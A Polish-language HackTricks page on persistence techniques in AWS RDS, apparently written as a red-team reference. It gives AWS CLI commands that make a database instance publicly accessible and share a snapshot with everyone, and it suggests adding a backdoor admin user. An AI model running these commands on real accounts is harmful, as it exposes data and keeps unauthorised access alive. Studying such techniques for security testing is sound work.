Polish - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - RDS Persistence

Nauka hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

RDS

Aby uzyskać więcej informacji, sprawdź:

pageAWS - Relational Database (RDS) Enum

Uczynienie instancji publicznie dostępną: rds:ModifyDBInstance

Atakujący posiadający to uprawnienie może modyfikować istniejącą instancję RDS w celu włączenia dostępności publicznej.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Utwórz użytkownika admina wewnątrz bazy danych

Atakujący mógłby po prostu utworzyć użytkownika wewnątrz bazy danych, więc nawet jeśli hasło głównego użytkownika zostanie zmienione, nie traci dostępu do bazy danych.

Udostępnij migawkę publicznie

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

PreviousAWS - Lightsail PersistenceNextAWS - S3 Persistence

Last updated